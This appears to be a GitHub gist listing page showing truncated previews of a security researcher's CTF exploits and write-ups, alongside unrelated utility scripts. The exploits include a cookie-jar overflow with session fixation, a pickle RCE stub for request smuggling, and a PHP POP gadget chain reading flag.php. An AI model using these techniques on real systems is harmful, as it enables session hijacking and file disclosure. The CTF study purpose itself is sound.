
@DreyAnd
DreyAnd / doomer-solver.py
Created April 1, 2025 07:25
SCC2025 - Doomer solution
from urllib.parse import quote
import httpx
import random
import string
import time
def generate_random_creds() -> str:
    username = "".join(random.choices(string.ascii_letters + string.digits, k=8))
    password = "".join(random.choices(string.ascii_letters + string.digits, k=8))
@DreyAnd
DreyAnd / exp.py
Created April 22, 2024 22:39
Umass CTF 2024 HTTP Request Smuggling Challenge
import socket
import pickle
import base64
import os
import requests
host = "test.ctf"
port = 5000
class RCE:
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
} // cookie jar overflow to get our session on top
document.cookie="session=.eJwlzkFOAzEMheG7ZI2QYyd20hU3GdlODCM6VJopbBB371Ss36-n7zctsc_jI11Cr8d8Scs60iVhNdfaM0ExRZmlAc_MURUI1AGtlzNBldnYJZN4hWY4GYU6Y68wIqx4zUNgUhE2hNy5IXkG65wduuD50oVKsBsqc8gggO6YTsj3Mfd_zc_q93V7e990vb76bTtXP_ZY7rfP-fXUshcPEqjBVK0UoihDuzQ9sRaRsYVGpL8HalZEQw.ZIBGow._I7RDVGPLQVfSP4mjIrlGJ_zoxc; domain=.hackthe.space" // future admin

-- Insecure Java Deserialization --

The goal of this writeup is to give a quick walkthrough of practical scenarios of Deserialization vulnerabilities that arise in many programming languages, specifically Java in our case, and how we can go from using a simple pre-built gadget chain to writing our own custom gadget chains and eventually gaining code execution on a target server.

1. What even is Deserialization?

Deserialization is the process of rebuilding a data object (an object or other complex data structure, encoded in a defined format) from a stream of bytes:

Image

@DreyAnd
DreyAnd / intigriti-july-xss-writeup.md
Created July 29, 2022 18:32
Intigriti July XSS writeup

The Intigriti July XSS challenge was a great challenge created by antonvroemans which included a quite funny bug de-escalation from an SQL injection to an XSS with a CSP bypass. Leaving that aside, it was a great chance to practice skills in multiple attack vectors and improve.

The challenge

The challenge rules are the following:

Image

The goal is to pop a 0-click XSS inside that domain, who would've thought of any other vulnerabilities right?

@DreyAnd
DreyAnd / exp.php
Created January 24, 2022 01:34
MRCTF2020 - ezpop
<?php
// POP gadget structure: Show __wakeup() -> Show __toString() -> Test __get()
// -> Modifier __invoke() -> Modifier append() --> LFI
class Modifier {
    protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show {
@DreyAnd
DreyAnd / goroutines-setup.go
Created November 6, 2021 14:21
usual setup for concurrency
package main
import (
    "fmt"
    "time"
    "sync"
)
func DatabaseAdder(wg *sync.WaitGroup, new_subdomain string) {
    defer wg.Done()
@DreyAnd
DreyAnd / r53-remove.py
Created October 5, 2021 09:05
remove all route53 zones
import subprocess
import sys
#easier than boto3
def list_zones():
    # raw string so the jq interpolation "\(.Name)" is passed through unchanged
    # (a plain string would warn about an invalid escape sequence)
    listZones = r"""aws route53 list-hosted-zones-by-name | jq '.HostedZones[] | "\(.Name) \(.Id)"'""" # returns max first 100 (do a while loop)
    listZone_proc = subprocess.Popen(listZones, stdout=subprocess.PIPE, shell=True)
    listZone_out = listZone_proc.stdout.read().decode('utf-8').split('\n')
{
    "name": "BlackBurpTheme",
    "dark": true,
    "author": "DreyAnd",
    "editorScheme": "/HyperScheme.xml",
    "ui": {
        "*": {
            "background": "#000000",
            "inactiveBackground": "#000000",
            "activeBackground": "#000000",